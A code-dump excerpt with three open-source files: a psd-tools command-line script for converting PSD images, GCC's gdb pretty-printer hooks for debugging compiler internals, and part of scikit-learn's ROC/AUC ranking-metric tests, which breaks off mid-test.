codercarl/psd-tools | src/psd_tools/cli.py | 13 | 1920 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals, print_function
import logging
import docopt
import psd_tools.reader
import psd_tools.decoder
from psd_tools import PSDImage
from psd_tools.user_api.layers import group_layers
from psd_tools.debug import pprint
from psd_tools.version import __version__
logger = logging.getLogger('psd_tools')
logger.addHandler(logging.StreamHandler())
def main():
"""
psd-tools.py
Usage:
psd-tools.py convert <psd_filename> <out_filename> [options]
psd-tools.py export_layer <psd_filename> <layer_index> <out_filename> [options]
psd-tools.py debug <filename> [options]
psd-tools.py -h | --help
psd-tools.py --version
Options:
-v --verbose Be more verbose.
--encoding <encoding> Text encoding [default: utf8].
"""
args = docopt.docopt(main.__doc__, version=__version__)
if args['--verbose']:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
encoding = args['--encoding']
if args['convert']:
psd = PSDImage.load(args['<psd_filename>'], encoding=encoding)
im = psd.as_PIL()
im.save(args['<out_filename>'])
elif args['export_layer']:
psd = PSDImage.load(args['<psd_filename>'], encoding=encoding)
index = int(args['<layer_index>'])
im = psd.layers[index].as_PIL()
im.save(args['<out_filename>'])
print(psd.layers)
psd.as_PIL()
elif args['debug']:
with open(args['<filename>'], "rb") as f:
decoded = psd_tools.decoder.parse(
psd_tools.reader.parse(f, encoding)
)
print("\nHeader\n------")
print(decoded.header)
print("\nDecoded data\n-----------")
pprint(decoded)
print("\nLayers\n------")
pprint(group_layers(decoded))
| mit |
tuxillo/aarch64-dragonfly-gcc | gcc/gdbhooks.py | 17 | 21078 | # Python hooks for gdb for debugging GCC
# Copyright (C) 2013-2015 Free Software Foundation, Inc.
# Contributed by David Malcolm <dmalcolm@redhat.com>
# This file is part of GCC.
# GCC is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 3, or (at your option) any later
# version.
# GCC is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
# You should have received a copy of the GNU General Public License
# along with GCC; see the file COPYING3. If not see
# <http://www.gnu.org/licenses/>.
"""
Enabling the debugging hooks
----------------------------
gcc/configure (from configure.ac) generates a .gdbinit within the "gcc"
subdirectory of the build directory, and when run by gdb, this imports
gcc/gdbhooks.py from the source directory, injecting useful Python code
into gdb.
You may see a message from gdb of the form:
"path-to-build/gcc/.gdbinit" auto-loading has been declined by your `auto-load safe-path'
as a protection against untrustworthy python scripts. See
http://sourceware.org/gdb/onlinedocs/gdb/Auto_002dloading-safe-path.html
The fix is to mark the paths of the build/gcc directory as trustworthy.
An easy way to do so is by adding the following to your ~/.gdbinit script:
add-auto-load-safe-path /absolute/path/to/build/gcc
for the build directories for your various checkouts of gcc.
If it's working, you should see the message:
Successfully loaded GDB hooks for GCC
as gdb starts up.
During development, I've been manually invoking the code in this way, as a
precanned way of printing a variety of different kinds of value:
gdb \
-ex "break expand_gimple_stmt" \
-ex "run" \
-ex "bt" \
--args \
./cc1 foo.c -O3
Examples of output using the pretty-printers
--------------------------------------------
Pointer values are generally shown in the form:
<type address extra_info>
For example, an opt_pass* might appear as:
(gdb) p pass
$2 = <opt_pass* 0x188b600 "expand"(170)>
The name of the pass is given ("expand"), together with the
static_pass_number.
Note that you can dereference the pointer in the normal way:
(gdb) p *pass
$4 = {type = RTL_PASS, name = 0x120a312 "expand",
[etc, ...snipped...]
and you can suppress pretty-printers using /r (for "raw"):
(gdb) p /r pass
$3 = (opt_pass *) 0x188b600
Basic blocks are shown with their index in parentheses, apart from the
CFG's entry and exit blocks, which are given as "ENTRY" and "EXIT":
(gdb) p bb
$9 = <basic_block 0x7ffff041f1a0 (2)>
(gdb) p cfun->cfg->x_entry_block_ptr
$10 = <basic_block 0x7ffff041f0d0 (ENTRY)>
(gdb) p cfun->cfg->x_exit_block_ptr
$11 = <basic_block 0x7ffff041f138 (EXIT)>
CFG edges are shown with the src and dest blocks given in parentheses:
(gdb) p e
$1 = <edge 0x7ffff043f118 (ENTRY -> 6)>
Tree nodes are printed using Python code that emulates print_node_brief,
running in gdb, rather than in the inferior:
(gdb) p cfun->decl
$1 = <function_decl 0x7ffff0420b00 foo>
For usability, the type is printed first (e.g. "function_decl"), rather
than just "tree".
RTL expressions use a kludge: they are pretty-printed by injecting
calls into print-rtl.c into the inferior:
Value returned is $1 = (note 9 8 10 [bb 3] NOTE_INSN_BASIC_BLOCK)
(gdb) p $1
$2 = (note 9 8 10 [bb 3] NOTE_INSN_BASIC_BLOCK)
(gdb) p /r $1
$3 = (rtx_def *) 0x7ffff043e140
This won't work for coredumps, and probably in other circumstances, but
it's a quick way of getting lots of debuggability quickly.
Callgraph nodes are printed with the name of the function decl, if
available:
(gdb) frame 5
#5 0x00000000006c288a in expand_function (node=<cgraph_node* 0x7ffff0312720 "foo">) at ../../src/gcc/cgraphunit.c:1594
1594 execute_pass_list (g->get_passes ()->all_passes);
(gdb) p node
$1 = <cgraph_node* 0x7ffff0312720 "foo">
vec<> pointers are printed as the address followed by the elements in
braces. Here's a length 2 vec:
(gdb) p bb->preds
$18 = 0x7ffff0428b68 = {<edge 0x7ffff044d380 (3 -> 5)>, <edge 0x7ffff044d3b8 (4 -> 5)>}
and here's a length 1 vec:
(gdb) p bb->succs
$19 = 0x7ffff0428bb8 = {<edge 0x7ffff044d3f0 (5 -> EXIT)>}
You cannot yet use array notation [] to access the elements within the
vector: attempting to do so instead gives you the vec itself (for vec[0]),
or a (probably) invalid cast to vec<> for the memory after the vec (for
vec[1] onwards).
Instead (for now) you must access m_vecdata:
(gdb) p bb->preds->m_vecdata[0]
$20 = <edge 0x7ffff044d380 (3 -> 5)>
(gdb) p bb->preds->m_vecdata[1]
$21 = <edge 0x7ffff044d3b8 (4 -> 5)>
"""
import os.path
import re
import sys
import gdb
import gdb.printing
import gdb.types
# Convert "enum tree_code" (tree.def and tree.h) to a dict:
tree_code_dict = gdb.types.make_enum_dict(gdb.lookup_type('enum tree_code'))
# ...and look up specific values for use later:
IDENTIFIER_NODE = tree_code_dict['IDENTIFIER_NODE']
TYPE_DECL = tree_code_dict['TYPE_DECL']
# Similarly for "enum tree_code_class" (tree.h):
tree_code_class_dict = gdb.types.make_enum_dict(gdb.lookup_type('enum tree_code_class'))
tcc_type = tree_code_class_dict['tcc_type']
tcc_declaration = tree_code_class_dict['tcc_declaration']
# Python3 has int() with arbitrary precision (bignum). Python2 int() is 32-bit
# on 32-bit hosts but remote targets may have 64-bit pointers there; Python2
# long() is always 64-bit but Python3 no longer has anything named long.
def intptr(gdbval):
return long(gdbval) if sys.version_info.major == 2 else int(gdbval)
class Tree:
"""
Wrapper around a gdb.Value for a tree, with various methods
corresponding to macros in gcc/tree.h
"""
def __init__(self, gdbval):
self.gdbval = gdbval
def is_nonnull(self):
return intptr(self.gdbval)
def TREE_CODE(self):
"""
Get gdb.Value corresponding to TREE_CODE (self)
as per:
#define TREE_CODE(NODE) ((enum tree_code) (NODE)->base.code)
"""
return self.gdbval['base']['code']
def DECL_NAME(self):
"""
Get Tree instance corresponding to DECL_NAME (self)
"""
return Tree(self.gdbval['decl_minimal']['name'])
def TYPE_NAME(self):
"""
Get Tree instance corresponding to result of TYPE_NAME (self)
"""
return Tree(self.gdbval['type_common']['name'])
def IDENTIFIER_POINTER(self):
"""
Get str correspoinding to result of IDENTIFIER_NODE (self)
"""
return self.gdbval['identifier']['id']['str'].string()
class TreePrinter:
"Prints a tree"
def __init__ (self, gdbval):
self.gdbval = gdbval
self.node = Tree(gdbval)
def to_string (self):
# like gcc/print-tree.c:print_node_brief
# #define TREE_CODE(NODE) ((enum tree_code) (NODE)->base.code)
# tree_code_name[(int) TREE_CODE (node)])
if intptr(self.gdbval) == 0:
return '<tree 0x0>'
val_TREE_CODE = self.node.TREE_CODE()
# extern const enum tree_code_class tree_code_type[];
# #define TREE_CODE_CLASS(CODE) tree_code_type[(int) (CODE)]
val_tree_code_type = gdb.parse_and_eval('tree_code_type')
val_tclass = val_tree_code_type[val_TREE_CODE]
val_tree_code_name = gdb.parse_and_eval('tree_code_name')
val_code_name = val_tree_code_name[intptr(val_TREE_CODE)]
#print(val_code_name.string())
result = '<%s 0x%x' % (val_code_name.string(), intptr(self.gdbval))
if intptr(val_tclass) == tcc_declaration:
tree_DECL_NAME = self.node.DECL_NAME()
if tree_DECL_NAME.is_nonnull():
result += ' %s' % tree_DECL_NAME.IDENTIFIER_POINTER()
else:
pass # TODO: labels etc
elif intptr(val_tclass) == tcc_type:
tree_TYPE_NAME = Tree(self.gdbval['type_common']['name'])
if tree_TYPE_NAME.is_nonnull():
if tree_TYPE_NAME.TREE_CODE() == IDENTIFIER_NODE:
result += ' %s' % tree_TYPE_NAME.IDENTIFIER_POINTER()
elif tree_TYPE_NAME.TREE_CODE() == TYPE_DECL:
if tree_TYPE_NAME.DECL_NAME().is_nonnull():
result += ' %s' % tree_TYPE_NAME.DECL_NAME().IDENTIFIER_POINTER()
if self.node.TREE_CODE() == IDENTIFIER_NODE:
result += ' %s' % self.node.IDENTIFIER_POINTER()
# etc
result += '>'
return result
######################################################################
# Callgraph pretty-printers
######################################################################
class CGraphNodePrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
result = '<cgraph_node* 0x%x' % intptr(self.gdbval)
if intptr(self.gdbval):
# symtab_node::name calls lang_hooks.decl_printable_name
# default implementation (lhd_decl_printable_name) is:
# return IDENTIFIER_POINTER (DECL_NAME (decl));
tree_decl = Tree(self.gdbval['decl'])
result += ' "%s"' % tree_decl.DECL_NAME().IDENTIFIER_POINTER()
result += '>'
return result
######################################################################
# Dwarf DIE pretty-printers
######################################################################
class DWDieRefPrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
if intptr(self.gdbval) == 0:
return '<dw_die_ref 0x0>'
result = '<dw_die_ref 0x%x' % intptr(self.gdbval)
result += ' %s' % self.gdbval['die_tag']
if intptr(self.gdbval['die_parent']) != 0:
result += ' <parent=0x%x %s>' % (intptr(self.gdbval['die_parent']),
self.gdbval['die_parent']['die_tag'])
result += '>'
return result
######################################################################
class GimplePrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
if intptr(self.gdbval) == 0:
return '<gimple 0x0>'
val_gimple_code = self.gdbval['code']
val_gimple_code_name = gdb.parse_and_eval('gimple_code_name')
val_code_name = val_gimple_code_name[intptr(val_gimple_code)]
result = '<%s 0x%x' % (val_code_name.string(),
intptr(self.gdbval))
result += '>'
return result
######################################################################
# CFG pretty-printers
######################################################################
def bb_index_to_str(index):
if index == 0:
return 'ENTRY'
elif index == 1:
return 'EXIT'
else:
return '%i' % index
class BasicBlockPrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
result = '<basic_block 0x%x' % intptr(self.gdbval)
if intptr(self.gdbval):
result += ' (%s)' % bb_index_to_str(intptr(self.gdbval['index']))
result += '>'
return result
class CfgEdgePrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
result = '<edge 0x%x' % intptr(self.gdbval)
if intptr(self.gdbval):
src = bb_index_to_str(intptr(self.gdbval['src']['index']))
dest = bb_index_to_str(intptr(self.gdbval['dest']['index']))
result += ' (%s -> %s)' % (src, dest)
result += '>'
return result
######################################################################
class Rtx:
def __init__(self, gdbval):
self.gdbval = gdbval
def GET_CODE(self):
return self.gdbval['code']
def GET_RTX_LENGTH(code):
val_rtx_length = gdb.parse_and_eval('rtx_length')
return intptr(val_rtx_length[code])
def GET_RTX_NAME(code):
val_rtx_name = gdb.parse_and_eval('rtx_name')
return val_rtx_name[code].string()
def GET_RTX_FORMAT(code):
val_rtx_format = gdb.parse_and_eval('rtx_format')
return val_rtx_format[code].string()
class RtxPrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
self.rtx = Rtx(gdbval)
def to_string (self):
"""
For now, a cheap kludge: invoke the inferior's print
function to get a string to use the user, and return an empty
string for gdb
"""
# We use print_inline_rtx to avoid a trailing newline
gdb.execute('call print_inline_rtx (stderr, (const_rtx) %s, 0)'
% intptr(self.gdbval))
return ''
# or by hand; based on gcc/print-rtl.c:print_rtx
result = ('<rtx_def 0x%x'
% (intptr(self.gdbval)))
code = self.rtx.GET_CODE()
result += ' (%s' % GET_RTX_NAME(code)
format_ = GET_RTX_FORMAT(code)
for i in range(GET_RTX_LENGTH(code)):
print(format_[i])
result += ')>'
return result
######################################################################
class PassPrinter:
def __init__(self, gdbval):
self.gdbval = gdbval
def to_string (self):
result = '<opt_pass* 0x%x' % intptr(self.gdbval)
if intptr(self.gdbval):
result += (' "%s"(%i)'
% (self.gdbval['name'].string(),
intptr(self.gdbval['static_pass_number'])))
result += '>'
return result
######################################################################
class VecPrinter:
# -ex "up" -ex "p bb->preds"
def __init__(self, gdbval):
self.gdbval = gdbval
def display_hint (self):
return 'array'
def to_string (self):
# A trivial implementation; prettyprinting the contents is done
# by gdb calling the "children" method below.
return '0x%x' % intptr(self.gdbval)
def children (self):
if intptr(self.gdbval) == 0:
return
m_vecpfx = self.gdbval['m_vecpfx']
m_num = m_vecpfx['m_num']
m_vecdata = self.gdbval['m_vecdata']
for i in range(m_num):
yield ('[%d]' % i, m_vecdata[i])
######################################################################
# TODO:
# * hashtab
# * location_t
class GdbSubprinter(gdb.printing.SubPrettyPrinter):
def __init__(self, name, class_):
super(GdbSubprinter, self).__init__(name)
self.class_ = class_
def handles_type(self, str_type):
raise NotImplementedError
class GdbSubprinterTypeList(GdbSubprinter):
"""
A GdbSubprinter that handles a specific set of types
"""
def __init__(self, str_types, name, class_):
super(GdbSubprinterTypeList, self).__init__(name, class_)
self.str_types = frozenset(str_types)
def handles_type(self, str_type):
return str_type in self.str_types
class GdbSubprinterRegex(GdbSubprinter):
"""
A GdbSubprinter that handles types that match a regex
"""
def __init__(self, regex, name, class_):
super(GdbSubprinterRegex, self).__init__(name, class_)
self.regex = re.compile(regex)
def handles_type(self, str_type):
return self.regex.match(str_type)
class GdbPrettyPrinters(gdb.printing.PrettyPrinter):
def __init__(self, name):
super(GdbPrettyPrinters, self).__init__(name, [])
def add_printer_for_types(self, name, class_, types):
self.subprinters.append(GdbSubprinterTypeList(name, class_, types))
def add_printer_for_regex(self, name, class_, regex):
self.subprinters.append(GdbSubprinterRegex(name, class_, regex))
def __call__(self, gdbval):
type_ = gdbval.type.unqualified()
str_type = str(type_)
for printer in self.subprinters:
if printer.enabled and printer.handles_type(str_type):
return printer.class_(gdbval)
# Couldn't find a pretty printer (or it was disabled):
return None
def build_pretty_printer():
pp = GdbPrettyPrinters('gcc')
pp.add_printer_for_types(['tree'],
'tree', TreePrinter)
pp.add_printer_for_types(['cgraph_node *'],
'cgraph_node', CGraphNodePrinter)
pp.add_printer_for_types(['dw_die_ref'],
'dw_die_ref', DWDieRefPrinter)
pp.add_printer_for_types(['gimple', 'gimple_statement_base *',
# Keep this in the same order as gimple.def:
'gimple_cond', 'const_gimple_cond',
'gimple_statement_cond *',
'gimple_debug', 'const_gimple_debug',
'gimple_statement_debug *',
'gimple_label', 'const_gimple_label',
'gimple_statement_label *',
'gimple_switch', 'const_gimple_switch',
'gimple_statement_switch *',
'gimple_assign', 'const_gimple_assign',
'gimple_statement_assign *',
'gimple_bind', 'const_gimple_bind',
'gimple_statement_bind *',
'gimple_phi', 'const_gimple_phi',
'gimple_statement_phi *'],
'gimple',
GimplePrinter)
pp.add_printer_for_types(['basic_block', 'basic_block_def *'],
'basic_block',
BasicBlockPrinter)
pp.add_printer_for_types(['edge', 'edge_def *'],
'edge',
CfgEdgePrinter)
pp.add_printer_for_types(['rtx_def *'], 'rtx_def', RtxPrinter)
pp.add_printer_for_types(['opt_pass *'], 'opt_pass', PassPrinter)
pp.add_printer_for_regex(r'vec<(\S+), (\S+), (\S+)> \*',
'vec',
VecPrinter)
return pp
gdb.printing.register_pretty_printer(
gdb.current_objfile(),
build_pretty_printer())
def find_gcc_source_dir():
# Use location of global "g" to locate the source tree
sym_g = gdb.lookup_global_symbol('g')
path = sym_g.symtab.filename # e.g. '../../src/gcc/context.h'
srcdir = os.path.split(path)[0] # e.g. '../../src/gcc'
return srcdir
class PassNames:
"""Parse passes.def, gathering a list of pass class names"""
def __init__(self):
srcdir = find_gcc_source_dir()
self.names = []
with open(os.path.join(srcdir, 'passes.def')) as f:
for line in f:
m = re.match('\s*NEXT_PASS \((.+)\);', line)
if m:
self.names.append(m.group(1))
class BreakOnPass(gdb.Command):
"""
A custom command for putting breakpoints on the execute hook of passes.
This is largely a workaround for issues with tab-completion in gdb when
setting breakpoints on methods on classes within anonymous namespaces.
Example of use: putting a breakpoint on "final"
(gdb) break-on-pass
Press <TAB>; it autocompletes to "pass_":
(gdb) break-on-pass pass_
Press <TAB>:
Display all 219 possibilities? (y or n)
Press "n"; then type "f":
(gdb) break-on-pass pass_f
Press <TAB> to autocomplete to pass classnames beginning with "pass_f":
pass_fast_rtl_dce pass_fold_builtins
pass_feedback_split_functions pass_forwprop
pass_final pass_fre
pass_fixup_cfg pass_free_cfg
Type "in<TAB>" to complete to "pass_final":
(gdb) break-on-pass pass_final
...and hit <RETURN>:
Breakpoint 6 at 0x8396ba: file ../../src/gcc/final.c, line 4526.
...and we have a breakpoint set; continue execution:
(gdb) cont
Continuing.
Breakpoint 6, (anonymous namespace)::pass_final::execute (this=0x17fb990) at ../../src/gcc/final.c:4526
4526 virtual unsigned int execute (function *) { return rest_of_handle_final (); }
"""
def __init__(self):
gdb.Command.__init__(self, 'break-on-pass', gdb.COMMAND_BREAKPOINTS)
self.pass_names = None
def complete(self, text, word):
# Lazily load pass names:
if not self.pass_names:
self.pass_names = PassNames()
return [name
for name in sorted(self.pass_names.names)
if name.startswith(text)]
def invoke(self, arg, from_tty):
sym = '(anonymous namespace)::%s::execute' % arg
breakpoint = gdb.Breakpoint(sym)
BreakOnPass()
print('Successfully loaded GDB hooks for GCC')
| gpl-2.0 |
tmhm/scikit-learn | sklearn/metrics/tests/test_ranking.py | 127 | 40813 | from __future__ import division, print_function
import numpy as np
from itertools import product
import warnings
from scipy.sparse import csr_matrix
from sklearn import datasets
from sklearn import svm
from sklearn import ensemble
from sklearn.datasets import make_multilabel_classification
from sklearn.random_projection import sparse_random_matrix
from sklearn.utils.validation import check_array, check_consistent_length
from sklearn.utils.validation import check_random_state
from sklearn.utils.testing import assert_raises, clean_warning_registry
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_warns
from sklearn.metrics import auc
from sklearn.metrics import average_precision_score
from sklearn.metrics import coverage_error
from sklearn.metrics import label_ranking_average_precision_score
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import label_ranking_loss
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics.base import UndefinedMetricWarning
###############################################################################
# Utilities for testing
def make_prediction(dataset=None, binary=False):
"""Make some classification predictions on a toy dataset using a SVC
If binary is True restrict to a binary classification problem instead of a
multiclass classification problem
"""
if dataset is None:
# import some data to play with
dataset = datasets.load_iris()
X = dataset.data
y = dataset.target
if binary:
# restrict to a binary classification task
X, y = X[y < 2], y[y < 2]
n_samples, n_features = X.shape
p = np.arange(n_samples)
rng = check_random_state(37)
rng.shuffle(p)
X, y = X[p], y[p]
half = int(n_samples / 2)
# add noisy features to make the problem harder and avoid perfect results
rng = np.random.RandomState(0)
X = np.c_[X, rng.randn(n_samples, 200 * n_features)]
# run classifier, get class probabilities and label predictions
clf = svm.SVC(kernel='linear', probability=True, random_state=0)
probas_pred = clf.fit(X[:half], y[:half]).predict_proba(X[half:])
if binary:
# only interested in probabilities of the positive case
# XXX: do we really want a special API for the binary case?
probas_pred = probas_pred[:, 1]
y_pred = clf.predict(X[half:])
y_true = y[half:]
return y_true, y_pred, probas_pred
###############################################################################
# Tests
def _auc(y_true, y_score):
"""Alternative implementation to check for correctness of
`roc_auc_score`."""
pos_label = np.unique(y_true)[1]
# Count the number of times positive samples are correctly ranked above
# negative samples.
pos = y_score[y_true == pos_label]
neg = y_score[y_true != pos_label]
diff_matrix = pos.reshape(1, -1) - neg.reshape(-1, 1)
n_correct = np.sum(diff_matrix > 0)
return n_correct / float(len(pos) * len(neg))
def _average_precision(y_true, y_score):
"""Alternative implementation to check for correctness of
`average_precision_score`."""
pos_label = np.unique(y_true)[1]
n_pos = np.sum(y_true == pos_label)
order = np.argsort(y_score)[::-1]
y_score = y_score[order]
y_true = y_true[order]
score = 0
for i in range(len(y_score)):
if y_true[i] == pos_label:
# Compute precision up to document i
# i.e, percentage of relevant documents up to document i.
prec = 0
for j in range(0, i + 1):
if y_true[j] == pos_label:
prec += 1.0
prec /= (i + 1.0)
score += prec
return score / n_pos
def test_roc_curve():
# Test Area under Receiver Operating Characteristic (ROC) curve
y_true, _, probas_pred = make_prediction(binary=True)
fpr, tpr, thresholds = roc_curve(y_true, probas_pred)
roc_auc = auc(fpr, tpr)
expected_auc = _auc(y_true, probas_pred)
assert_array_almost_equal(roc_auc, expected_auc, decimal=2)
assert_almost_equal(roc_auc, roc_auc_score(y_true, probas_pred))
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_curve_end_points():
# Make sure that roc_curve returns a curve start at 0 and ending and
# 1 even in corner cases
rng = np.random.RandomState(0)
y_true = np.array([0] * 50 + [1] * 50)
y_pred = rng.randint(3, size=100)
fpr, tpr, thr = roc_curve(y_true, y_pred)
assert_equal(fpr[0], 0)
assert_equal(fpr[-1], 1)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thr.shape)
def test_roc_returns_consistency():
# Test whether the returned threshold matches up with tpr
# make small toy dataset
y_true, _, probas_pred = make_prediction(binary=True)
fpr, tpr, thresholds = roc_curve(y_true, probas_pred)
# use the given thresholds to determine the tpr
tpr_correct = []
for t in thresholds:
tp = np.sum((probas_pred >= t) & y_true)
p = np.sum(y_true)
tpr_correct.append(1.0 * tp / p)
# compare tpr and tpr_correct to see if the thresholds' order was correct
assert_array_almost_equal(tpr, tpr_correct, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_nonrepeating_thresholds():
# Test to ensure that we don't return spurious repeating thresholds.
# Duplicated thresholds can arise due to machine precision issues.
dataset = datasets.load_digits()
X = dataset['data']
y = dataset['target']
# This random forest classifier can only return probabilities
# significant to two decimal places
clf = ensemble.RandomForestClassifier(n_estimators=100, random_state=0)
# How well can the classifier predict whether a digit is less than 5?
# This task contributes floating point roundoff errors to the probabilities
train, test = slice(None, None, 2), slice(1, None, 2)
probas_pred = clf.fit(X[train], y[train]).predict_proba(X[test])
y_score = probas_pred[:, :5].sum(axis=1) # roundoff errors begin here
y_true = [yy < 5 for yy in y[test]]
# Check for repeating values in the thresholds
fpr, tpr, thresholds = roc_curve(y_true, y_score)
assert_equal(thresholds.size, np.unique(np.round(thresholds, 2)).size)
def test_roc_curve_multi():
# roc_curve not applicable for multi-class problems
y_true, _, probas_pred = make_prediction(binary=False)
assert_raises(ValueError, roc_curve, y_true, probas_pred)
def test_roc_curve_confidence():
# roc_curve for confidence scores
y_true, _, probas_pred = make_prediction(binary=True)
fpr, tpr, thresholds = roc_curve(y_true, probas_pred - 0.5)
roc_auc = auc(fpr, tpr)
assert_array_almost_equal(roc_auc, 0.90, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_curve_hard():
# roc_curve for hard decisions
y_true, pred, probas_pred = make_prediction(binary=True)
# always predict one
trivial_pred = np.ones(y_true.shape)
fpr, tpr, thresholds = roc_curve(y_true, trivial_pred)
roc_auc = auc(fpr, tpr)
assert_array_almost_equal(roc_auc, 0.50, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
# always predict zero
trivial_pred = np.zeros(y_true.shape)
fpr, tpr, thresholds = roc_curve(y_true, trivial_pred)
roc_auc = auc(fpr, tpr)
assert_array_almost_equal(roc_auc, 0.50, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
# hard decisions
fpr, tpr, thresholds = roc_curve(y_true, pred)
roc_auc = auc(fpr, tpr)
assert_array_almost_equal(roc_auc, 0.78, decimal=2)
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_curve_one_label():
y_true = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
y_pred = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
# assert there are warnings
w = UndefinedMetricWarning
fpr, tpr, thresholds = assert_warns(w, roc_curve, y_true, y_pred)
# all true labels, all fpr should be nan
assert_array_equal(fpr,
np.nan * np.ones(len(thresholds)))
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
# assert there are warnings
fpr, tpr, thresholds = assert_warns(w, roc_curve,
[1 - x for x in y_true],
y_pred)
# all negative labels, all tpr should be nan
assert_array_equal(tpr,
np.nan * np.ones(len(thresholds)))
assert_equal(fpr.shape, tpr.shape)
assert_equal(fpr.shape, thresholds.shape)
def test_roc_curve_toydata():
# Binary classification
y_true = [0, 1]
y_score = [0, 1]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1])
assert_array_almost_equal(fpr, [1, 1])
assert_almost_equal(roc_auc, 1.)
y_true = [0, 1]
y_score = [1, 0]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1, 1])
assert_array_almost_equal(fpr, [0, 0, 1])
assert_almost_equal(roc_auc, 0.)
y_true = [1, 0]
y_score = [1, 1]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1])
assert_array_almost_equal(fpr, [0, 1])
assert_almost_equal(roc_auc, 0.5)
y_true = [1, 0]
y_score = [1, 0]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1])
assert_array_almost_equal(fpr, [1, 1])
assert_almost_equal(roc_auc, 1.)
y_true = [1, 0]
y_score = [0.5, 0.5]
tpr, fpr, _ = roc_curve(y_true, y_score)
roc_auc = roc_auc_score(y_true, y_score)
assert_array_almost_equal(tpr, [0, 1])
assert_array_almost_equal(fpr, [0, 1])
assert_almost_equal(roc_auc, .5)
y_true = [0, 0]
y_score = [0.25, 0.75]
tpr, fpr, _ = roc_curve(y_true, y_score)
assert_raises(ValueError, roc_auc_score, y_true, y_score)
assert_array_almost_equal(tpr, [0., 0.5, 1.])
assert_array_almost_equal(fpr, [np.nan, np.nan, np.nan])
y_true = [1, 1]
y_score = [0.25, 0.75]
tpr, fpr, _ = roc_curve(y_true, y_score)
assert_raises(ValueError, roc_auc_score, y_true, y_score)
assert_array_almost_equal(tpr, [np.nan, np.nan])
assert_array_almost_equal(fpr, [0.5, 1.])
# Multi-label classification task
y_true = np.array([[0, 1], [0, 1]])
y_score = np.array([[0, 1], [0, 1]])
assert_raises(ValueError, roc_auc_score, y_true, y_score, average="macro")
assert_raises(ValueError, roc_auc_score, y_true, y_score,
average="weighted")
assert_almost_equal(roc_auc_score(y_true, y_score, average="samples"), 1.)
assert_almost_equal(roc_auc_score(y_true, y_score, average="micro"), 1.)
y_true = np.array([[0, 1], [0, 1]])
y_score = np.array([[0, 1], [1, 0]])
assert_raises(ValueError, roc_auc_score, y_true, y_score, average="macro")
assert_raises(ValueError, roc_auc_score, y_true, y_score,
average="weighted")
assert_almost_equal(roc_auc_score(y_true, y_score, average="samples"), 0.5)
assert_almost_equal(roc_auc_score(y_true, y_score, average="micro"), 0.5)
y_true = np.array([[1, 0], [0, 1]])
y_score = np.array([[0, 1], [1, 0]])
assert_almost_equal(roc_auc_score(y_true, y_score, average="macro"), 0)
assert_almost_equal(roc_auc_score(y_true, y_score, average="weighted"), 0)
assert_almost_equal(roc_auc_score(y_true, y_score, average="samples"), 0)
assert_almost_equal(roc_auc_score(y_true, y_score, average="micro"), 0)
y_true = np.array([[1, 0], [0, 1]])
y_score = np.array([[0.5, 0.5], [0.5, 0.5]])
assert_almost_equal(roc_auc_score(y_true, y_score, average="macro"), .5)
assert_almost_equal(roc_auc_score(y_true, y_score, average="weighted"), .5)
assert_almost_equal(roc_auc_score(y_true, y_score, average="samples"), .5)
assert_almost_equal(roc_auc_score(y_true, y_score, average="micro"), .5)
def test_auc():
# Test Area Under Curve (AUC) computation
x = [0, 1]
y = [0, 1]
assert_array_almost_equal(auc(x, y), 0.5)
x = [1, 0]
y = [0, 1]
assert_array_almost_equal(auc(x, y), 0.5)
x = [1, 0, 0]
y = [0, 1, 1]
assert_array_almost_equal(auc(x, y), 0.5)
x = [0, 1]
y = [1, 1]
assert_array_almost_equal(auc(x, y), 1)
x = [0, 0.5, 1]
y = [0, 0.5, 1]
assert_array_almost_equal(auc(x, y), 0.5)
def test_auc_duplicate_values():
# Test Area Under Curve (AUC) computation with duplicate values
# auc() was previously sorting the x and y arrays according to the indices
# from numpy.argsort(x), which was reordering the tied 0's in this example
# and resulting in an incorrect area computation. This test detects the
# error.
x = [-2.0, 0.0, 0.0, 0.0, 1.0]
y1 = [2.0, 0.0, 0.5, 1.0, 1.0]
y2 = [2.0, 1.0, 0.0, 0.5, 1.0]
